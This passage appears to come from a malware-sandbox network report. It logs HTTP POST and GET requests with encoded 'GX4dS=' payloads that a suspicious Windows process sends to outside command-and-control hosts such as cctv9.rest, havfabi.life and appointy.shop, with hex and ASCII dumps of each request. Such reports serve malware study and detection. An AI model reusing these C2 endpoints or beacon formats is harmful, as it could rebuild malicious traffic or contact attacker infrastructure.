35 74 4e 45 71 51 7a 71 7a 4c 56 57 5a 34 52 31 72 73 6a 4b 6c 49 4d 67 73 6f 79 53 48 62 78 38 55 77 63 43 74 37 4f 74 38 73 58 64 41 5a 4e 4a 4e 53 41 4e 6e 70 6d 67 7a 4d 37 6f 72 42 7a 36 78 64 54 44 79 4d 6d 39 6e 41 38 2f 65 2b 53 57 4b 30 2b 63 77 69 73 48 65 35 64 6b 4c 48 57 66 74 61 54 6c 66 6b 54 48 6d 43 75 30 44 5a 46 32 34 34 47 53 44 48 4d 42 6c 59 6f 41 3d Data Ascii: GX4dS=NtqDA1m80CKBpGMYpNcMRnlHd2FFiyhR1j3vwqLH6dJrjCXMsy1ScZ/fhfVWQdekcMUAiHpZfOv+z24CZkqQBBwsCzJ5tNEqQzqzLVWZ4R1rsjKlIMgsoySHbx8UwcCt7Ot8sXdAZNJNSANnpmgzM7orBz6xdTDyMm9nA8/e+SWK0+cwisHe5dkLHWftaTlfkTHmCu0DZF244GSDHMBlYoA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	57405	114.134.188.182	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:02.963305950 CEST	10834	OUT	POST /s7c9/ HTTP/1.1 Host: www.cctv9.rest Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.cctv9.rest Referer: http://www.cctv9.rest/s7c9/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10302 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 4e 74 71 44 41 31 6d 38 30 43 4b 42 70 47 4d 59 70 4e 63 4d 52 6e 6c 48 64 32 46 46 69 79 68 52 31 6a 33 76 77 71 4c 48 36 64 52 72 6a 77 76 4d 39 68 74 53 54 35 2f 66 75 50 56 56 51 64 65 70 63 4d 4e 49 69 48 6c 76 66 4d 6e 2b 70 55 77 43 62 57 43 51 50 42 77 73 4a 54 4a 43 6e 74 45 37 51 7a 37 30 4c 57 75 5a 34 52 31 72 73 6c 47 6c 42 39 67 73 71 79 53 49 53 52 38 59 30 63 43 57 37 50 45 44 73 58 59 33 5a 39 70 4e 53 67 64 6e 36 41 4d 7a 45 37 6f 70 41 7a 36 70 64 54 66 62 4d 6d 52 4e 41 38 37 30 2b 52 4b 4b 6b 72 52 6e 6d 2b 36 46 37 50 49 58 54 32 2f 78 43 69 56 4e 6f 54 50 6d 4b 2f 78 66 4b 56 4b 77 32 6e 2b 49 58 38 6c 44 47 2b 6d 51 6c 73 62 73 39 61 79 35 42 72 74 39 6e 53 42 51 58 38 43 38 6c 6c 35 46 64 47 44 57 35 70 76 46 32 33 34 68 6f 72 5a 33 5a 72 4f 2b 79 47 32 4b 6b 31 6c 42 37 4d 34 39 36 73 6b 6e 4a 48 6d 32 56 30 66 47 47 66 41 71 6a 53 4a 4e 44 73 77 6e 6e 57 32 65 4d 78 42 68 2b 64 6d 37 38 75 35 70 5a 71 6e 68 7a 44 62 78 4b 33 75 78 79 63 4b 41 55 6c 30 55 [TRUNCATED] Data Ascii: GX4dS=NtqDA1m80CKBpGMYpNcMRnlHd2FFiyhR1j3vwqLH6dRrjwvM9htST5/fuPVVQdepcMNIiHlvfMn+pUwCbWCQPBwsJTJCntE7Qz70LWuZ4R1rslGlB9gsqySISR8Y0cCW7PEDsXY3Z9pNSgdn6AMzE7opAz6pdTfbMmRNA870+RKKkrRnm+6F7PIXT2/xCiVNoTPmK/xfKVKw2n+IX8lDG+mQlsbs9ay5Brt9nSBQX8C8ll5FdGDW5pvF234horZ3ZrO+yG2Kk1lB7M496sknJHm2V0fGGfAqjSJNDswnnW2eMxBh+dm78u5pZqnhzDbxK3uxycKAUl0UHL5hdW0qAsyZa6rWi2bWSEQ70v0KFNSzGBh4o4dUuA945w0YfK6gYETqkPcHLqjQOi9LggLRwCrRFlBkHAR2h134R11hxk+fUbdwxc8iFptmzLvOuHn+y/6LMSBoKtCoNFivKEChVDcNzDonFvvqp8CVtHaQPxAMYWQPYx7OWuZIjjmw+8uC+nBEF8dpITpnLmuMcSOoCXRZpI1/vbVbAR++kPL1tz9kKP9h9q2YMz6ugKTnuinGCz+ldGF9ICW986nfwqrlnRo5z1iOO0s3lI9rnuRVoD64RNaS5YH8OnX288hK7aR/RMvNOy30t79z50mmd3RPvNmGG4mtG+Qk3ct5/i7Hcy0vMWzpnO4V+u5aYQivKLxNgWgQEiXtYGvfN3yqo3zud89ia8qOdNAI150irMdXYPd5BdCkQf/k7BebvFwTkHr8a3L8sfVn1QK+cvrePHNfkzErUI9qXkWxVRgmSmtL+x84uA3o8UJwMQK8g+BvIvEBNFsLuYrUA4wpDVNe4FvXAJXMCANCTZvmxLomV5Mgck7oGAsAVjV/bfK5FL/GPgUbreUW2ozSnap+/irMLHC7TgYcv2cxR+a6z4e6fjHTtwHgsET2T5+fD+TJRepNrARhSsEP5MiRFrRH1jUIaEmd7K2Ed0rrUDrEQTfTbJ+CSUNrXO [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	57406	114.134.188.182	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:05.497658014 CEST	467	OUT	GET /s7c9/?GX4dS=AvCjDDvglUmypHRh3tcpFDEnXU0eyxJ0gEyBu7LJ6NAS+DraqwYREr+jqcUkWNOrfKJXuGVAM+jH6WkALlmgLCdPJ31xuM0fYjGNAwDkyRY4kQ2+D/EajS4=&QHdD=Mr7PG HTTP/1.1 Host: www.cctv9.rest Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Sep 30, 2024 08:32:06.389854908 CEST	318	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 30 Sep 2024 06:32:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 153 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	57407	162.213.249.216	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:11.562030077 CEST	738	OUT	POST /wieb/ HTTP/1.1 Host: www.havfabi.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.havfabi.life Referer: http://www.havfabi.life/wieb/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 202 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 54 69 54 37 49 32 66 4b 47 69 33 39 6c 53 4f 6e 45 66 58 6a 34 50 7a 39 69 7a 66 46 46 34 6a 49 62 5a 2f 70 41 47 4c 57 79 6d 79 4e 68 62 4c 41 71 6d 59 58 45 73 67 55 50 30 53 71 46 57 65 61 39 7a 35 35 31 74 6d 57 4e 57 44 63 65 2f 34 74 76 39 76 4a 70 4b 4b 78 7a 76 67 70 4f 44 53 32 66 67 37 68 32 67 5a 41 48 63 6f 63 6e 76 59 41 7a 44 6c 6a 75 58 46 48 5a 64 71 64 67 53 79 45 31 68 6d 78 4f 36 7a 46 51 47 39 59 43 74 2f 6f 4e 6f 37 51 34 49 2f 32 33 74 76 4d 70 6e 35 61 58 61 4e 51 51 32 71 75 69 31 51 64 75 71 4c 7a 36 64 32 55 69 6a 78 67 48 31 66 36 30 6a 76 43 6a 41 3d 3d Data Ascii: GX4dS=TiT7I2fKGi39lSOnEfXj4Pz9izfFF4jIbZ/pAGLWymyNhbLAqmYXEsgUP0SqFWea9z551tmWNWDce/4tv9vJpKKxzvgpODS2fg7h2gZAHcocnvYAzDljuXFHZdqdgSyE1hmxO6zFQG9YCt/oNo7Q4I/23tvMpn5aXaNQQ2qui1QduqLz6d2UijxgH1f60jvCjA==
Sep 30, 2024 08:32:12.162758112 CEST	595	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:32:12 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	57408	162.213.249.216	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:14.111445904 CEST	758	OUT	POST /wieb/ HTTP/1.1 Host: www.havfabi.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.havfabi.life Referer: http://www.havfabi.life/wieb/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 222 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 54 69 54 37 49 32 66 4b 47 69 33 39 6e 79 65 6e 48 38 2f 6a 7a 50 7a 79 6e 7a 66 46 4c 59 6a 45 62 59 44 70 41 44 71 4a 78 56 57 4e 68 35 6a 41 72 6b 67 58 44 73 67 55 64 55 53 6c 4c 32 66 55 39 7a 31 4c 31 74 71 57 4e 53 6a 63 65 36 38 74 76 4f 47 66 6f 61 4b 33 36 50 67 72 41 6a 53 32 66 67 37 68 32 67 64 71 48 63 77 63 6e 66 6f 41 79 6e 78 67 6b 33 46 47 63 64 71 64 78 43 79 66 31 68 6d 58 4f 35 32 67 51 46 56 59 43 76 33 6f 4e 38 76 66 72 6f 2f 30 39 4e 75 51 67 6d 67 4b 4f 70 73 2f 64 58 4b 30 68 55 6b 38 76 73 61 70 72 73 58 44 77 6a 56 54 61 79 57 4f 35 67 53 4c 34 47 62 4b 70 39 73 76 55 6f 39 6f 45 63 55 74 71 4b 67 49 41 79 59 3d Data Ascii: GX4dS=TiT7I2fKGi39nyenH8/jzPzynzfFLYjEbYDpADqJxVWNh5jArkgXDsgUdUSlL2fU9z1L1tqWNSjce68tvOGfoaK36PgrAjS2fg7h2gdqHcwcnfoAynxgk3FGcdqdxCyf1hmXO52gQFVYCv3oN8vfro/09NuQgmgKOps/dXK0hUk8vsaprsXDwjVTayWO5gSL4GbKp9svUo9oEcUtqKgIAyY=
Sep 30, 2024 08:32:14.693823099 CEST	595	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:32:14 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	57409	162.213.249.216	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:16.662796021 CEST	10840	OUT	POST /wieb/ HTTP/1.1 Host: www.havfabi.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.havfabi.life Referer: http://www.havfabi.life/wieb/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10302 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 54 69 54 37 49 32 66 4b 47 69 33 39 6e 79 65 6e 48 38 2f 6a 7a 50 7a 79 6e 7a 66 46 4c 59 6a 45 62 59 44 70 41 44 71 4a 78 56 65 4e 68 4b 62 41 72 44 30 58 43 73 67 55 47 55 54 69 4c 32 65 49 39 7a 73 41 31 74 57 67 4e 55 76 63 66 59 30 74 70 2f 47 66 69 61 4b 33 34 50 67 32 4f 44 53 76 66 6a 54 39 32 67 4e 71 48 63 77 63 6e 63 77 41 6b 44 6c 67 69 33 46 48 5a 64 71 5a 67 53 7a 52 31 68 2b 70 4f 36 62 56 51 55 31 59 43 4d 66 6f 50 4a 37 66 78 6f 2f 71 36 4e 75 59 67 6d 64 51 4f 70 41 5a 64 58 2b 4b 68 55 51 38 75 61 44 2b 2f 4e 79 61 73 69 56 31 41 54 6d 4f 34 78 43 33 37 47 69 31 35 4f 73 64 45 71 74 56 66 62 34 6d 2b 71 73 41 61 69 39 6c 6a 32 33 35 67 59 67 69 63 45 52 69 6e 67 30 74 66 75 6e 58 35 59 32 63 4e 57 47 31 65 72 44 43 68 31 4e 6c 58 7a 65 66 6e 77 31 30 58 41 79 6f 4d 2b 6d 47 71 32 31 63 33 4a 70 46 39 2b 77 41 39 32 61 32 59 36 2b 44 2b 71 2b 46 4a 72 67 30 33 7a 6f 53 55 58 46 42 57 4a 4f 63 57 32 7a 6f 6e 68 71 4c 2b 78 78 30 53 41 66 51 64 6a 39 53 46 68 4a 68 [TRUNCATED] Data Ascii: GX4dS=TiT7I2fKGi39nyenH8/jzPzynzfFLYjEbYDpADqJxVeNhKbArD0XCsgUGUTiL2eI9zsA1tWgNUvcfY0tp/GfiaK34Pg2ODSvfjT92gNqHcwcncwAkDlgi3FHZdqZgSzR1h+pO6bVQU1YCMfoPJ7fxo/q6NuYgmdQOpAZdX+KhUQ8uaD+/NyasiV1ATmO4xC37Gi15OsdEqtVfb4m+qsAai9lj235gYgicERing0tfunX5Y2cNWG1erDCh1NlXzefnw10XAyoM+mGq21c3JpF9+wA92a2Y6+D+q+FJrg03zoSUXFBWJOcW2zonhqL+xx0SAfQdj9SFhJhybvM8IEiDGsfUG4Em578FlxDJaaHriDWDogKuSt83miUXK1+RsfY/Myb6XF/wSNqR0ISi3passlIyVgj6CYFGoyMIzNe7Sp9ZheJX1B3oRFy9SeHiyBoIk50+QiTJC/DD0JmCujTT4PvjKSO6fr+FVCRTiio5KgSsaIshldAMHsm3czRi4574+GTK2gGWEldw4UbV1OG7usJQnayyAMw4sxh3+7yGlsORdzeNN/lFnS/Lp3omQahYirTFHIebqytfYimk2XlW4RFskjkD93su0kQdzm9uG1b9uAuhY9gpI98kmph2TGzAl/jssTzxgVf3HGwDG4/dyJutvmKTKtsM6FP5g6GzsqFWIMY+3AYzZuC81eC9wH04Z5vQGSuVQGYXfoKDpujgH3p/89ybxRZp8/70+UUJSSdiO1xi4yFQnab4tiawepeEx6arumrbIJ8+/jj2RpZLN2OwtNzt4KZYdobw22evEFLKYBC0cmlJcUJaKNdQMQWtfmUW+hOkCS3/QLAGkk2aVSiliUfvp/P2tCeycS7uIm7TuCVihId+0u2de1QYa2pfW9gASZwuHahGYKzOhYgg9v0ciMXtQ0Qv+406+KCrczXH6kXfo4ZVX1YXWSlkO6F+4+F1SXc3/7BqwFKRoUi9UBRzILBxOm0i7NshhdhOMD2c+ [TRUNCATED]
Sep 30, 2024 08:32:17.336055040 CEST	595	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:32:17 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	57410	162.213.249.216	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:19.204807997 CEST	469	OUT	GET /wieb/?QHdD=Mr7PG&GX4dS=eg7bLBeRfjnWkUSkFPDFz7CDjhz4SauAKYy7Gl2+zW+bwKjkoH9UXc52MkveFRCVuGtTn8uwV230S6082MDCqbLQ2LkwAkuHHQvkznNaIdZpiNU96nR7hSc= HTTP/1.1 Host: www.havfabi.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Sep 30, 2024 08:32:19.789115906 CEST	610	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:32:19 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	57411	13.248.169.48	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:24.840087891 CEST	741	OUT	POST /a1sy/ HTTP/1.1 Host: www.appointy.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.appointy.shop Referer: http://www.appointy.shop/a1sy/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 202 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 31 31 4d 73 65 6b 6b 6c 6d 42 30 67 66 75 44 66 38 67 62 53 35 61 64 66 6d 6b 35 38 78 61 54 54 54 52 4b 55 36 4d 75 4d 4c 49 34 32 77 47 52 56 75 68 69 32 5a 2b 76 56 43 56 67 65 2b 34 37 4d 33 48 69 48 62 32 67 33 43 6f 49 4a 36 57 46 74 4d 52 47 58 57 76 52 46 5a 57 75 43 4f 6c 39 46 53 65 43 56 58 31 31 6b 50 37 57 76 4f 52 38 6d 33 2f 7a 48 49 44 68 58 51 74 36 43 2f 2b 46 30 38 66 55 58 4d 67 77 63 61 76 65 77 71 73 76 4b 4b 63 49 38 45 37 74 74 63 47 4a 78 4d 79 71 49 56 34 55 46 38 63 38 79 7a 61 5a 78 66 38 6e 73 64 38 44 6d 61 51 6c 52 39 50 42 73 58 69 34 33 64 51 3d 3d Data Ascii: GX4dS=11MsekklmB0gfuDf8gbS5adfmk58xaTTTRKU6MuMLI42wGRVuhi2Z+vVCVge+47M3HiHb2g3CoIJ6WFtMRGXWvRFZWuCOl9FSeCVX11kP7WvOR8m3/zHIDhXQt6C/+F08fUXMgwcavewqsvKKcI8E7ttcGJxMyqIV4UF8c8yzaZxf8nsd8DmaQlR9PBsXi43dQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	57412	13.248.169.48	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:27.386893988 CEST	761	OUT	POST /a1sy/ HTTP/1.1 Host: www.appointy.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.appointy.shop Referer: http://www.appointy.shop/a1sy/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 222 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 31 31 4d 73 65 6b 6b 6c 6d 42 30 67 4e 61 48 66 37 44 6a 53 78 61 64 63 6a 6b 35 38 37 36 54 50 54 52 47 55 36 4a 4f 63 4c 62 4d 32 77 6e 68 56 76 67 69 32 65 2b 76 56 51 31 67 66 39 49 37 58 33 48 75 68 62 7a 41 33 43 6f 63 4a 36 58 31 74 4e 69 2b 55 45 50 52 62 54 47 75 41 41 46 39 46 53 65 43 56 58 31 78 61 50 37 